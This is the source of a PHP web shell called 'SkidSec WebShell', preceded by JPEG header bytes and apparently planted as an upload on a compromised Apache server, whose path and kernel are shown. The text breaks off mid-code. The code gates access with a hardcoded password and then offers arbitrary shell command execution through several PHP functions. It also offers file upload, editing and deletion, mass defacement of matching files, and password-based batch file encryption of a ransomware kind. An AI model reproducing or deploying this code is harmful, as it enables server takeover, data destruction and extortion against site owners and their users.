JFIF   ( %!1!%)+...383,7(-.+  ++-+++++-++-++--+--+-+-------+-++-+--+---+++--+7+-+"F!1AQaq"2BRb#3Sr$CDsT&!Q1Aa"2Rbq ?򉄘ǷLR HR,nNb .&W)fJbMOYxj-\bT2(4CQ"qiC/ " %0Jl"e2V  0SDd2@TV^{cW&F͉x9#l,.XɳvRZ C8S 6ml!@!E! `FS!M #(d)Q lml1ml Ų&x(ʨ2NFmj@D<dN5UN˄uTB emLAy#` ` ` I!I 6āHBxL & J#7BQ.$hv h q+tC"EJ) 8R e2U2Y@j%6PF^4LnNBp"8)4JI-ֲvK ^؊)hz[T5˗",Rҥf8ڤS4ʘ!`D ` X+ L,(hl)*S##`6[`0*L T H*HA@I&&r1kr*r*)N$#L  1#ZFSl `[( ("((he`4 Ch [="A R / 0I`twCDcWh"i) cLad\BcLKHZ"ZEW$Ƚ@A~i^`S *A&h:+c Y6vϕGClRPs.`H`(@<$qDe pL@DpLX, E2MP A  `II m& AQ "AT rbg# g2!SiLj*3L \ G;TFL`K BMy 2S`YLh1 d >-"ZfD^Q DH" RAbEV#Lfq,(rETp64-IJ!*p4F$q;G8DQ/TKP2$jp3KW]FtLtƉ1ol]VBgػJH6 )h61GJR7Nj.Z4piJRDd]t]0dP]:N.b'⹙SvDSz]L,_#ugT&[~?cS^"{Bh{/=ۑxOk̳O59o dar793`)SeYM@\ "$E(Tm&)N2Ih)F5EDed(FS,Pa @!@#@lea HCD$11jCLJqcod S3yd*,lL+QEfsgW1nw)cT#dS HXkFJB"6(ʝH)H"#EZh:Y`khݳh%Sc<mlAko2]gDqQtro=3OƸU9_-t8UvW3sGəg*#:c)><"wc\ASmT|6Ę>9~#1Ƈ~ڒE1vVi# I MM#u$8W 5ǍfƬΜg*Qpi1ȩFOf۔S,/⎯(Lrմ`(Z LsbA \6 6dm[I=!r:REI.wgzG)ԇSbӑxuׇTyyL^e'x^ty4Z&eB]I|v59Jjhm;Ng񷫳n<ϞҼѝjk;׹DlY^ҍ\+x9V!j([cmS.NO6jxNζrm&oײizT$N>?~ Sl-:iڥk\at#E!CL`.O0a*w/WV7/r)DŽt7'Nĵ#7O1 ]{[/-2bA<$&Gm_4t)_>)mjG;V^'k59o>ɌM,ؾf9z6 4v_3T.5V/RD-5 %T5XTޫ4TaZ`U *ƱUƲ UG"5+sJJ2E9#܎kr2G3Bb,XM6H: ?@p!'\4V02aԙ) hbZ]:` ev3ʘ'}!ohȒ*TJjr[RFyQ*#{h{R]J]Lr-.D-.җfo$D ?X0%~1P.Og{cWϫ22&Ϭ_V.W3nmiOl}+!˫#`kR33aUb0-g:qmsέ+0HO|&nhOn+}n5QF_"gvLm/z'+r'n_oC语i|1}Gi|}_D~9JZ_%DVQp\koۅjAs~/c0ksUJi^W9W5!>?O:q|ˣSIB/&K<(lg(%Wg$|LW7vߤW߇q|jef3D H\S6(eJb*@&sTKTW/*@v:.N- @ITʓ1Zg&-eꓝM r]EMס{q$b]'7Z7N:O~lNlP7iͲk)$O^퉢<YSD*hr'Z#5e6t[Fdh AJǔP9P 1\R).Il+jI*,(ܢ22N*OwKFX gc?\mB7iA+εe8 "ġ/p5pW-$މ-[a 5ViAW/V{/&UsF./՞ҕ*)rZg.^_+gt_z-oAbqQn*WlHyZ*\TaEewlLR3ԹȭN}MM}aih"5ܕRT$:~'TcT|*)xGC>n+r{XU xuF"<~67у'fxlf`r3D*#Z1ђfH`2dIWo/qB| 63xxW6^m%Kvg>\>x>!H5Nr8J/FJ9Wx(Hou" S'kWاC\9ְ#^OaҮ+~gnkuЉ,aWU*1 읍jnb|e= :2.UL`Q}YS&gI.c=a`%j:C%2@^>])25/ܙ<lzwɛ)ݣS4h3=J tyϬ.E7 8ڞGZu\_JHsݢϑ}IZ"ӳ=X<Ɖ2{a:{7L+>V}c)*lo Yv&+|L;>+/Sj26K+澡*;>-s"}M2] Ig5aCL*r"&\} #^R.7_Mgf}.ߌy(}Z\gP&ʠHj%</{.]rߙQ`>;5g;u6dԛ %xb|oՋTJ5Ϥ(]XqP>f{Jk2,8'~ZU6tMQsg XKg^2ϓ3},[wo۴I|ܷ%[Ol\Pkr]Y//cg6U⧻/VПi8ys_n<\~cze!!H~x;QJZKȮ^ȧG|cS~8ji,Fo+,y~?pk)u /in3JmkX(Mj1N 4c Epc>BO *LfQO&` c;LjcYf 1ɻ)CLsY^Y5" lP/wuEln&dav,(;'W9ej ku`-KHI՟%ԁʁ 1\}?OjsF^Xn$Ё.օC>D:?I @aGE.ĩ1 $ et~T`߸Ir'RX.Zwc%~U=r>-UaFbǺ?R=Z?i'[ASS;siJrzy>nxu$[_B\4}:r'ҵj1_v-[;y?ֹ0I16 . M%4^!S&t ! h !zQð.bBT ?@]?CHq(rd!.$>/x+bnʎNN#w)` )*f!-ɂ\(طYLHzc`Uq7BfCcE0ԉ4Fم쏠ce5T r͸GVlФ?ѣ} mhrkly.Ts㷖)Mө S^%'g>wk%bP[}j~ǾV#K -Fgv켼ǨgɼeSz/6{M=BPZFu\Q75n3Iݤ.W9QfF{vJwF't[@iVj4G~KOnH߿_Do=.c.One?E+GfGN⧭H?4;u`ua|V-+j4?48n ɦ=-]puv&Jc}K>b%U x8pz6L8AXFsW]N55ҦbIWZQ7ï Ԗ3cjz匩ӺOTɖƴ%a'MI}cdR$ݚIζ̝ LIu>J3{^෠㜦˯xܿe\b"2y'x{ RDW b+o2KFhR0:U늞En>լRӉt Iڹ\ wշQEv"v;EJ)yl[5:F0=b4,\PqKtv4{bQz:>C7"8W#Zjdd| cjz%K %Z 9dD{=NFʳAƩtI)kS*s$`:A\ʬ*ֹ9{Nl|eJ١rQnM%z_#x_•TO><)kyD %GN<~y>vfǧB)F)c\lې(#\ h`fgfjTBdhhHL2Y0^ Y0^-"D!QaI15 m~ gՒd|;#gMn(P$l H.R2^PU")pN` N8󫅂OJ;^jz\uumJMF|ηq[]$Vrrt:Q^;QPkHՠ{]HwˆMuIr7!r&- j%"9LtUb56+^TWBqdhHAD7 HwKH^F3LIq #hK`]IWKiH?کǴeԥQ>g{^q^>HKoOB||8aݏS}{S_]ϸ/X~ܵw'OSPAf֩ܟ[>7 @[ֵ;G߇QU*Cթ *OKU^zz[fRnpcJX9u<iq8B]u8 ]I,;[G#2W.¸D8rPG Y%PBJ= wo;PJgx6;yB`3zZGPAͫy{5Nb_re*ONHR]Ji)U{Ӓ:qqɏ[mB4࢒I$ 2vpBADY`DIVAn"Bh$&&cMbdB 鮆wHR'E(ѸZA*H~{B M҅n\@N{7ISCp Vd( r+bg|ns:qg:|J|ɪV.UVaAS͓FyRuLѦT騬 `3􏳕{eo/Tz8DkW?,cl~TqLne֠[B*D +t 6˦S;5KjV3e WBrT.XSHm sl5F%NGM`Y )": J!W4]HTrPX2 QYɕ\m2VLd+`,^ѺiPztUGY6+cӧ6] U%u/ˈFOiB*nFF#ұJ Z/c')?Q͟5.8E~G6e<\?}GkhMFUظOqhEA - "`dQ#(4Ԧf VLmc@q5J8K; M^JZnn)9Zm\ qIJqS: i[9~Oaƒ]Z4F&+666( N]쁼LM(oyvUI/Χ[ھ]hTˉG".SeYgu;hRDtڬv=5 ׁqMS\Ȭi5D]1$*0UL1QY`QdLb[+z9";'yi`OT/4{@EZ'Y0>4I*d nM#5hі.vrM[]Ä;]\ʦS,叕DQZq0fӌI͋]TNK"#;?F;aURx_4WDm+F*0XJE@){ 1R-E2(@Qh l D rT.Q;[J;[`30`ɀ 2#=JeSsxRjG=`H rLJ@ Y$JaB2/x( "Id'6O0CI$:Ol+}I>[L|iK+]ZrH*2Aʶ uHRd)OrrbSx=5dmue1neܬ"e>Lw94勲u ҏ_4GuоJw]QtgSk(qW(6h|v= 1=P/\YZ|R>"*5W/ίR'o %R$5= .!VIRMf4*aR5nv% Usj:V Lj]Bn/TZ&.2„ܒBP)aYRʌW!#ErGf';tW$czI*\KI,c7Zc-ўj|p+-ђ{eg 2;R_{VLM]7sؒFmԻy853gҾqJG!E̤ӏqzs༿? U#R)ŧU(,>,&,-^e^۔.b EW^n<)\9.QeJuFiSh2"EL8yeCKQD\5R,D5.P]c1STt*ZFJ.T:N #%]M}khOe(͓iEMsɆ3( YF<"Ly^*[ry6.ɸm k݊iT%nM8 $Q#F# q 1*?% iS^4oܗ wWPS,aNޖxOxڽqp#F6&o,7LJuMΤK(Td{U Ƹf|q5U{3[FLNK6ӵQY5+'>Q3FSk).&:5z yZq/*q$d+Ge+$lO@Nڤy5eBvˌ䖥shS:JksgksF ꧸oi-FYxy9[Vȼĝ'_.[y2U*c?E+:TsWՀgOS> z75>ncߏ-Kz8ԋ,Ϧ70Z9_1h$Xiu10)0$+$! qsE4wRkh2*T.s%DH:`:=k.'WB{ ȮRGҷ7чVg)CHS}1ݍԳۂ<8g_4y*-Ml\]mZT)mJ~|k<6zWjf4'*u%RNRȉZA) .VLtp 4 V&mtJ#l˅;&{]8>TmhoLXOeD^_J>]jsSej﫦iOM SK([!Vc5zn-A@p]Ӄ \3kmK>#-sܧ?NLar@Js?…Xldny]݌E5•9.8hh69#7js׳R,'pqt:kgPhRԄ+ՕG9}="ֲ\kǁm R73pg$t3+o |o\]'ee5ɐ.7ѐ|ZعSF{qkx5-$Q h5*1yM$ 7)hJ2Kg`-hn*>)EYDIkBpȩAzfǪ>7O K#lߤg]:u~huُ۵u}(mjGIj܏6ES~/5CiRy|kVKGBޭ3;w /jꏈUu>iƪi:WRo'yr4C/?c:w!?\'?#Q:>u/?uEeuG*xY2)?־CAr*23_ץ}գk1%(_ _6aԗ _4 $ϗ+ϫɆzǾIgu?Y<#_xS>i\uɇ۽r}[ͫyRoWCC!H,iD։"Cj5 4] cTk2YZRBvRY~FqQt^RO-g"QP]Ih/t:ljs YӹqI] wqXp KV+8j} uu8PGP&zF:;8+ Sx9(. Q}:ƻWr,Ũ*'shfƧ-6__5,DH{* qp묘G MA}QRe{dyMucǨɾ7߈Avϩe͜jmUi p3\5,ާbf:o+7#ܾ~iU#up=}˄k{NV8m!ҌiptޜBvKi}!ש3UK)`igӞVMR'J[ky~g&6vǍ7ķ>uXd(3瓓[]QTTqnͮz1~_͓k俸0~Z1գ =18cL 5^lf^k^<ҲJɬcC-[^;J8j_q=WpeA_6 4.Ntc>Sv2Jf;G8. 5[,;ArSTˬmpmzjGe EoǩOgDWaGhz<|kT\$Q=u/ci˜S mN&Ok~'0,a} s + NC-G'(*>vw~&*wYG Ŷ K-L/$߮l/A/^:Z@X- Q-D2`@M2+w$Q"胊"47&+Dh'9Y* L7VhT+ -?K]Ik \Ϣgy) s v z)Z ˦2&ލ OjmG9@8F_u䊜r>3K%Yg-FFI]e+Kxkzװy"\Q4Ri'0+P=V&Sw3N/U|UEt*uS c M*tsBE 2ʃ@Kir(˫LRr璜Zy@].%NbXvz덟 hӰNMe#|g͒po9^licxB[e' {U? mlt%?霋ǒxZc X]ϗ15SeE{-Ӕi~DƯO|ë5a@G=%<ƧAs*+tzo, IpȔ|:X6J3Z5JXd]2 3%v*GvE@(S&SX7D0^{5t Z{ﮄsh- ]ɑqEV=^Ki9äBtI@&pEg*O<`F-}ǎ51H,<~qibQѓɳx#l$G9td1U+Sq%B[jOq+^ޏ7K >YY  $KK{*˝e"|$g"6v,,9.DaA,qэI~ܨ|kdv; hz2]x5{M5M~yלqTzUl9Mӏ.WVnkun !jzKO!v|& ;gۇ2BrI閵C tqHe[Zkގ=Q;OԶiᵞBcIU eN cOGz S__>.hNgG6).J$_Taѯ5^LqeB]O?A]H;ò{^0ٺuޚxB|:q'xu4"9Ο7k^eZ_fQOmzm̗{c3ٵKO|m*ek(8"yO(ٵ{LJb2Ǩkgg1_/qrDՆ[_l\ I~Bsc/x ),,̿@PFޞ>O)<<=5m=^x6}~6qoYGޣiY{uN+<,CǚwVxe~c!,5R4u/9In=G•^PF6ɼM򿶤$"\|78ؖYU cXFOKc4s-=6O<;.ϴ޶$q>e? qY}StirX?e/&R'ʑ[ѯMi{?8\g^>\!-VZCf.ȾzRWMh_{^H)mz}V%չM.EJUz7z>ZW6\BW~:W3!S_4~m ǚ! ;VeGKFڵ858Buj:ZZ(/H׭eav!$gpLV)țAJO~YBꤞ厅XJdjg{hR9~_f '5U+}W5%ZjzgTtozYD @%JK\qymeЪKIIp"xoz\B1$G)8Ԅ Jeyc".yyVBR-%BEA-k^Luj cYwԄ%X!e-4ZRḡlJvYsB԰˗0?RM\TlaߏVu4BmY!UyYylgd!m2$i=[hN,6)_~7͖CDF2zÕ{?l;Hܲk׋!/XAłrCXEI{]P[e! ?%Ktqܱ5! jַĞ*TvAG)fuxTҖV7~ 4=r! ob%jTwU$Bnqed䤿@0P&V]HJ)^YrޯĿbsY8=1! n}UD*7uƫi~!s[W{V9J;~Ӯ|[3s۷dڔIj?qJ'O,IkE]G(5\ۖ7)-g,ŶǗ=~e>k쐁%(g˦o[fxN_baGBm:܆VGЗ,G_D!/og,ҢVܤ_iS_~@ SkidSec Webshell

SkidSec WebShell

Server Address : 172.31.38.4

Web Server : Apache/2.4.58 (Ubuntu)

Uname : Linux ip-172-31-38-4 6.14.0-1017-aws #17~24.04.1-Ubuntu SMP Wed Nov 5 10:48:17 UTC 2025 x86_64

PHP Version : 7.4.33



Current Path : /var/www/html/admin/pmi_model_photo/



Current File : /var/www/html/admin/pmi_model_photo/file.php
<?php
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('display_errors', 0);
@ini_set('memory_limit', '-1');

if (session_status() == PHP_SESSION_NONE) {
    session_start();
}

if (isset($_POST['logout'])) {
    session_destroy();
    header('Location: ?');
    exit;
}

$p = "cyrenpogi";
if (isset($_POST['pass']) && $_POST['pass'] == $p) {
    $_SESSION['auth'] = 1;
    $_SESSION['login_time'] = time();
}

if (!isset($_SESSION['auth']) || !isset($_SESSION['login_time']) || (time() - $_SESSION['login_time']) > 86400) {
    if (isset($_SESSION['auth'])) {
        session_destroy();
        session_start();
    }
    echo '<!DOCTYPE html>
    <html>
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { 
            background: linear-gradient(135deg, #0a0a0a 0%, #1a1a1a 100%); 
            min-height: 100vh; 
            display: flex; 
            justify-content: center; 
            align-items: center; 
            font-family: "Segoe UI", -apple-system, BlinkMacSystemFont, Roboto, sans-serif;
            padding: 20px;
        }
        .login-container {
            width: 100%;
            max-width: 420px;
            background: rgba(25, 25, 35, 0.95);
            border-radius: 20px;
            padding: 40px 30px;
            box-shadow: 0 15px 35px rgba(0, 255, 100, 0.15),
                        0 0 0 1px rgba(0, 255, 100, 0.1);
            border: 1px solid rgba(0, 255, 100, 0.3);
            backdrop-filter: blur(10px);
        }
        .login-title {
            color: #00ff88;
            text-align: center;
            font-size: 28px;
            font-weight: 700;
            margin-bottom: 30px;
            letter-spacing: 1px;
            text-shadow: 0 0 10px rgba(0, 255, 100, 0.5);
        }
        .login-input {
            width: 100%;
            padding: 16px 20px;
            background: rgba(15, 20, 25, 0.9);
            border: 2px solid rgba(0, 255, 100, 0.4);
            border-radius: 12px;
            color: #00ff88;
            font-size: 16px;
            margin-bottom: 25px;
            transition: all 0.3s ease;
            outline: none;
        }
        .login-input:focus {
            border-color: #00ff88;
            box-shadow: 0 0 0 3px rgba(0, 255, 100, 0.2);
            background: rgba(20, 25, 35, 0.95);
        }
        .login-input::placeholder {
            color: rgba(0, 255, 100, 0.5);
        }
        .login-btn {
            width: 100%;
            padding: 16px;
            background: linear-gradient(135deg, #00ff88 0%, #00cc66 100%);
            border: none;
            border-radius: 12px;
            color: #001a0f;
            font-size: 18px;
            font-weight: 700;
            cursor: pointer;
            transition: all 0.3s ease;
            letter-spacing: 0.5px;
        }
        .login-btn:hover {
            transform: translateY(-2px);
            box-shadow: 0 8px 20px rgba(0, 255, 100, 0.4);
            background: linear-gradient(135deg, #00ff99 0%, #00dd77 100%);
        }
        .login-btn:active {
            transform: translateY(0);
        }
        .logo {
            text-align: center;
            font-size: 50px;
            margin-bottom: 20px;
            color: #00ff88;
            filter: drop-shadow(0 0 8px rgba(0, 255, 100, 0.7));
        }
        .copyright {
            text-align: center;
            color: rgba(0, 255, 100, 0.4);
            font-size: 12px;
            margin-top: 25px;
            padding-top: 15px;
            border-top: 1px solid rgba(0, 255, 100, 0.1);
        }
        @media (max-width: 480px) {
            .login-container {
                padding: 30px 20px;
                border-radius: 16px;
            }
            .login-title {
                font-size: 24px;
            }
            .login-input {
                padding: 14px 18px;
            }
            .login-btn {
                padding: 15px;
            }
        }
    </style>
    </head>
    <body>
        <div class="login-container">
            <div class="logo">🔐</div>
            <h2 class="login-title">SYSTEM ACCESS</h2>
            <form method="post">
                <input type="password" name="pass" class="login-input" placeholder="Enter Password" required autocomplete="off">
                <button type="submit" class="login-btn">🔑 LOGIN</button>
            </form>
            <div class="copyright">© Secure Access v2.0</div>
        </div>
    </body>
    </html>';
    exit();
}

$action = isset($_GET['a']) ? $_GET['a'] : 'index';
$path = isset($_GET['p']) ? $_GET['p'] : '.';
if (strpos($path, '..') !== false || !is_dir($path)) {
    $path = '.';
}
$path = realpath($path) ? realpath($path) : '.';

function exe($c, $p = '.') {
    $d = '';
    $c = trim($c);
    if (empty($c)) return '';
    
    if (strtolower(substr(PHP_OS, 0, 3)) === 'win') {
        $c = 'cd /d "' . $p . '" && ' . $c . ' 2>&1';
    } else {
        $c = 'cd "' . $p . '" && ' . $c . ' 2>&1';
    }
    
    if (function_exists('popen')) {
        $h = @popen($c, 'r');
        if ($h) {
            while (!feof($h)) {
                $d .= fread($h, 4096);
            }
            pclose($h);
        }
    } elseif (function_exists('proc_open')) {
        $ds = array(
            0 => array('pipe', 'r'),
            1 => array('pipe', 'w'),
            2 => array('pipe', 'w')
        );
        $pr = @proc_open($c, $ds, $pi);
        if (is_resource($pr)) {
            fclose($pi[0]);
            $d = stream_get_contents($pi[1]);
            fclose($pi[1]);
            fclose($pi[2]);
            proc_close($pr);
        }
    } elseif (function_exists('system')) {
        ob_start();
        @system($c);
        $d = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $d = @shell_exec($c);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($c);
        $d = ob_get_clean();
    } elseif (function_exists('exec')) {
        @exec($c, $o);
        $d = implode("\n", $o);
    }
    if (empty($d)) {
        $d = "Command executed (no output)";
    }
    return $d;
}

function listFiles($p) {
    $r = array();
    if (is_dir($p) && $h = @opendir($p)) {
        while (($f = readdir($h)) !== false) {
            if ($f == '.' || $f == '..') continue;
            $fp = $p . DIRECTORY_SEPARATOR . $f;
            if (is_readable($fp)) {
                $r[] = array(
                    'name' => $f,
                    'path' => $fp,
                    'is_dir' => @is_dir($fp),
                    'size' => @filesize($fp),
                    'perm' => substr(sprintf('%o', @fileperms($fp)), -4),
                    'time' => @filemtime($fp) ? date('Y-m-d H:i:s', @filemtime($fp)) : 'Unknown'
                );
            }
        }
        closedir($h);
    }
    usort($r, function($a, $b) {
        if ($a['is_dir'] && !$b['is_dir']) return -1;
        if (!$a['is_dir'] && $b['is_dir']) return 1;
        return strcasecmp($a['name'], $b['name']);
    });
    return $r;
}

define('ENCRYPTION_MAGIC', 'ENCRYPTEDv1.0');

function isEncrypted($file) {
    if (!@is_file($file) || !is_readable($file)) return false;
    $handle = @fopen($file, 'rb');
    if (!$handle) return false;
    $signature = @fread($handle, strlen(ENCRYPTION_MAGIC));
    fclose($handle);
    return $signature === ENCRYPTION_MAGIC;
}

function encryptFile($file, $pass) {
    if (!@is_file($file) || !is_readable($file) || !is_writable($file)) {
        return false;
    }
    if (isEncrypted($file)) {
        return false;
    }
    $data = @file_get_contents($file);
    if ($data === false) return false;
    $salt = openssl_random_pseudo_bytes(16);
    $key = hash_pbkdf2('sha256', $pass, $salt, 10000, 32, true);
    $iv = openssl_random_pseudo_bytes(16);
    $enc = openssl_encrypt($data, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
    if ($enc === false) return false;
    $version = pack('V', 1);
    $result = @file_put_contents($file, ENCRYPTION_MAGIC . $version . $salt . $iv . $tag . $enc, LOCK_EX);
    return $result !== false;
}

function decryptFile($file, $pass) {
    if (!@is_file($file) || !is_readable($file) || !is_writable($file)) {
        return false;
    }
    if (!isEncrypted($file)) {
        return false;
    }
    $data = @file_get_contents($file);
    if ($data === false) return false;
    $offset = strlen(ENCRYPTION_MAGIC) + 4;
    $salt = substr($data, $offset, 16);
    $iv = substr($data, $offset + 16, 16);
    $tag = substr($data, $offset + 32, 16);
    $enc = substr($data, $offset + 48);
    $key = hash_pbkdf2('sha256', $pass, $salt, 10000, 32, true);
    $dec = openssl_decrypt($enc, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
    if ($dec === false) return false;
    $result = @file_put_contents($file, $dec, LOCK_EX);
    return $result !== false;
}

function massDeface($dir, $method, $content, $extensions) {
    $exts = array_map('trim', explode(',', strtolower($extensions)));
    $count = 0;
    if ($method == 'upload' && isset($_FILES['deface_file']['tmp_name']) && is_uploaded_file($_FILES['deface_file']['tmp_name'])) {
        $upload_content = file_get_contents($_FILES['deface_file']['tmp_name']);
        if ($upload_content === false) return 0;
    }
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $item) {
        if ($item->isFile() && $item->isWritable()) {
            $ext = strtolower(pathinfo($item->getPathname(), PATHINFO_EXTENSION));
            if (in_array($ext, $exts)) {
                if ($method == 'upload') {
                    if (isset($upload_content)) {
                        if (file_put_contents($item->getPathname(), $upload_content) !== false) {
                            $count++;
                        }
                    }
                } elseif ($method == 'code' && !empty($content)) {
                    if (file_put_contents($item->getPathname(), $content) !== false) {
                        $count++;
                    }
                }
            }
        }
    }
    return $count;
}

function createZip($files, $zipName) {
    if (!class_exists('ZipArchive')) {
        return false;
    }
    $zip = new ZipArchive();
    if ($zip->open($zipName, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
        return false;
    }
    foreach ($files as $file) {
        if (file_exists($file)) {
            if (is_dir($file)) {
                $it = new RecursiveIteratorIterator(
                    new RecursiveDirectoryIterator($file, RecursiveDirectoryIterator::SKIP_DOTS),
                    RecursiveIteratorIterator::SELF_FIRST
                );
                foreach ($it as $item) {
                    if ($item->isFile() && $item->isReadable()) {
                        $localPath = str_replace(dirname($file) . DIRECTORY_SEPARATOR, '', $item->getPathname());
                        $zip->addFile($item->getPathname(), $localPath);
                    }
                }
            } elseif (is_file($file) && is_readable($file)) {
                $zip->addFile($file, basename($file));
            }
        }
    }
    return $zip->close();
}

function searchFiles($dir, $query) {
    $results = array();
    if (empty($query)) return $results;
    
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    
    foreach ($it as $item) {
        if ($item->isFile() || $item->isDir()) {
            $filename = $item->getFilename();
            $pathname = $item->getPathname();
            
            if (stripos($filename, $query) !== false || stripos($pathname, $query) !== false) {
                $results[] = array(
                    'name' => $filename,
                    'path' => $pathname,
                    'is_dir' => $item->isDir(),
                    'size' => $item->isFile() ? $item->getSize() : 0,
                    'perm' => substr(sprintf('%o', $item->getPerms()), -4),
                    'time' => date('Y-m-d H:i:s', $item->getMTime())
                );
            }
        }
    }
    
    usort($results, function($a, $b) {
        if ($a['is_dir'] && !$b['is_dir']) return -1;
        if (!$a['is_dir'] && $b['is_dir']) return 1;
        return strcasecmp($a['name'], $b['name']);
    });
    
    return $results;
}

if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['a'])) {
    switch ($_POST['a']) {
        case 'upload':
            if (isset($_FILES['upload']) && is_array($_FILES['upload']['tmp_name'])) {
                $uploaded = 0;
                foreach ($_FILES['upload']['tmp_name'] as $k => $tmp) {
                    if ($_FILES['upload']['error'][$k] == 0 && is_uploaded_file($tmp)) {
                        $dest = $path . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name'][$k]);
                        if (move_uploaded_file($tmp, $dest)) {
                            $uploaded++;
                        }
                    }
                }
                if ($uploaded > 0) {
                    $_SESSION['message'] = $uploaded . ' file(s) uploaded successfully!';
                }
            }
            break;
        case 'newfile':
            if (!empty($_POST['filename'])) {
                $filename = trim(basename($_POST['filename']));
                if (!empty($filename)) {
                    $fullpath = $path . DIRECTORY_SEPARATOR . $filename;
                    if (touch($fullpath)) {
                        $_SESSION['message'] = 'File "' . htmlspecialchars($filename) . '" created!';
                    }
                }
            }
            break;
        case 'newfolder':
            if (!empty($_POST['foldername'])) {
                $foldername = trim(basename($_POST['foldername']));
                if (!empty($foldername)) {
                    $fullpath = $path . DIRECTORY_SEPARATOR . $foldername;
                    if (!file_exists($fullpath) && mkdir($fullpath, 0755, true)) {
                        $_SESSION['message'] = 'Folder "' . htmlspecialchars($foldername) . '" created!';
                    }
                }
            }
            break;
        case 'delete':
            if (isset($_POST['f']) && file_exists($_POST['f'])) {
                $f = $_POST['f'];
                if (is_file($f) && is_writable($f)) {
                    if (unlink($f)) {
                        $_SESSION['message'] = 'File deleted!';
                    }
                } elseif (is_dir($f) && is_writable(dirname($f))) {
                    $it = new RecursiveDirectoryIterator($f, RecursiveDirectoryIterator::SKIP_DOTS);
                    $files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::CHILD_FIRST);
                    foreach($files as $file) {
                        if ($file->isDir()){
                            rmdir($file->getRealPath());
                        } else {
                            unlink($file->getRealPath());
                        }
                    }
                    if (rmdir($f)) {
                        $_SESSION['message'] = 'Directory deleted!';
                    }
                }
            }
            break;
        case 'batchdelete':
            if (isset($_POST['selected_files']) && is_array($_POST['selected_files'])) {
                $deleted = 0;
                foreach ($_POST['selected_files'] as $file) {
                    if (file_exists($file) && is_writable($file)) {
                        if (is_file($file)) {
                            if (unlink($file)) $deleted++;
                        } elseif (is_dir($file)) {
                            $it = new RecursiveDirectoryIterator($file, RecursiveDirectoryIterator::SKIP_DOTS);
                            $files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::CHILD_FIRST);
                            foreach($files as $f) {
                                if ($f->isDir()){
                                    rmdir($f->getRealPath());
                                } else {
                                    unlink($f->getRealPath());
                                }
                            }
                            if (rmdir($file)) $deleted++;
                        }
                    }
                }
                $_SESSION['message'] = $deleted . ' item(s) deleted!';
            }
            break;
        case 'batchzip':
            if (isset($_POST['selected_files']) && is_array($_POST['selected_files']) && !empty($_POST['selected_files'])) {
                $zipName = $path . DIRECTORY_SEPARATOR . 'batch_' . date('Y-m-d_H-i-s') . '.zip';
                if (createZip($_POST['selected_files'], $zipName)) {
                    $_SESSION['message'] = 'Zip created: ' . basename($zipName);
                } else {
                    $_SESSION['error'] = 'Failed to create zip!';
                }
            }
            break;
        case 'batchencrypt':
            if (isset($_POST['selected_files']) && is_array($_POST['selected_files']) && isset($_POST['epass']) && !empty($_POST['epass'])) {
                $pass = trim($_POST['epass']);
                $encrypted = 0;
                foreach ($_POST['selected_files'] as $file) {
                    if (file_exists($file) && is_file($file) && is_writable($file) && !isEncrypted($file)) {
                        if (encryptFile($file, $pass)) {
                            $encrypted++;
                        }
                    }
                }
                $_SESSION['message'] = $encrypted . ' file(s) encrypted!';
            }
            break;
        case 'batchdecrypt':
            if (isset($_POST['selected_files']) && is_array($_POST['selected_files']) && isset($_POST['dpass']) && !empty($_POST['dpass'])) {
                $pass = trim($_POST['dpass']);
                $decrypted = 0;
                foreach ($_POST['selected_files'] as $file) {
                    if (file_exists($file) && is_file($file) && is_writable($file) && isEncrypted($file)) {
                        if (decryptFile($file, $pass)) {
                            $decrypted++;
                        }
                    }
                }
                $_SESSION['message'] = $decrypted . ' file(s) decrypted!';
            }
            break;
        case 'rename':
            if (isset($_POST['old']) && isset($_POST['new']) && file_exists($_POST['old'])) {
                $old = $_POST['old'];
                $new = dirname($old) . DIRECTORY_SEPARATOR . basename($_POST['new']);
                if (rename($old, $new)) {
                    $_SESSION['message'] = 'Renamed successfully!';
                }
            }
            break;
        case 'chmod':
            if (isset($_POST['f'], $_POST['perm']) && file_exists($_POST['f'])) {
                $file = $_POST['f'];
                $perm = $_POST['perm'];
                $realFile = realpath($file);
                $realCurrent = realpath($path);
                if (!$realFile || strpos($realFile, $realCurrent) !== 0) {
                    $_SESSION['error'] = 'Invalid file path!';
                    break;
                }
                if (!preg_match('/^[0-7]{3,4}$/', $perm)) {
                    $_SESSION['error'] = 'Invalid permission format! Use 3-4 digits (0-7)';
                    break;
                }
                if (strlen($perm) == 3) {
                    $perm = '0' . $perm;
                }
                $mode = octdec($perm);
                $filename = basename($file);
                $dangerousFiles = ['.htaccess', '.htpasswd', 'wp-config.php', 'config.php', 'database.php'];
                if (in_array($filename, $dangerousFiles) && $perm == '0777') {
                    $_SESSION['error'] = 'Cannot set 0777 on critical file: ' . $filename;
                    break;
                }
                if (chmod($file, $mode)) {
                    $_SESSION['message'] = 'Permissions changed to ' . $perm . '!';
                } else {
                    $_SESSION['error'] = 'Failed to change permissions!';
                }
            }
            break;
        case 'saveedit':
            if (isset($_POST['f'], $_POST['content']) && file_exists($_POST['f']) && is_writable($_POST['f'])) {
                if (file_put_contents($_POST['f'], $_POST['content']) !== false) {
                    $_SESSION['message'] = 'File saved successfully!';
                }
            }
            break;
        case 'encryptfile':
            if (isset($_POST['f'], $_POST['pass']) && file_exists($_POST['f'])) {
                $pass = trim($_POST['pass']);
                if (!empty($pass)) {
                    if (encryptFile($_POST['f'], $pass)) {
                        $_SESSION['message'] = 'File encrypted successfully!';
                    } else {
